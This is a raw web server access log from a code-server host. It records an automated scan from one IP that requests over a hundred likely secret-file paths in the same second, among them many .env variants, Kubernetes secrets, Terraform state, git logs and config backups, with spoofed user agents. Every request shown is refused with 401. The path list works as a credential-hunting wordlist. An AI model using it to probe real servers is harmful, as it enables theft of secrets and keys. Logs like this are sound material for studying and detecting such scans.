"-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/cms/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/logs/refs/heads/master" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/k8s/secrets.yaml" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.copy" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/vendor.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/var/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/directadmin/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/internal/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/jenkins/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/src/.env.production" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.buildkite/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202601" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/build/bundle.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/terraform.tfstate.backup" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config/app.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/nestjs/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/assets/vendor.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.secure/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.cache/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/amplify/.config/project-config.json" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config/secrets/prod.list.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/sealed-secrets.yml" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/assets/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/dist/app.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.sample" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/django/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/phpinfo.php7" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/debug/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.tmp" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/page-data/app-data.json" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/manifests/secrets.yaml" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_prod" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_production" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_backup" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/env" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_old" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/env.bak" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/environment" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/cart/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/payments/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/billing/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/stripe/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/subscriptions/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/orders/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/invoices/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/prestashop/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/modules/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/wp-content/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/wp-content/plugins/.env" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/shopify/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/vercel/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/wp-content/plugins/stripe-payments/.env" [Client 216.81.248.13] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.vercel/project.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.vercel/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/aws/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/firebase/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.firebase/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/azure/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/api/.env.production" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/rpc/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/v1/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config/.env.local" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config/.env.production" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/api/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/api/v3/.env" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/fly/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/api/v1/.env" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/services/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/server/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/drupal/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/railway/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/backend/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/nextjs/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/nuxt/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/laravel/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/server/.env.production" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/symfony/.env.local" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/wp/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/symfony/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.svelte-kit/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/sveltekit/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/astro/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/remix/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/solid/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/build/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/flask/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.output/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/output/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/..env" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/compose.env" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.keys/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/docker.env" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.secrets/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/._env" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.credentials/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/cpanel/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/containers/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/panel/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/hosting/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) 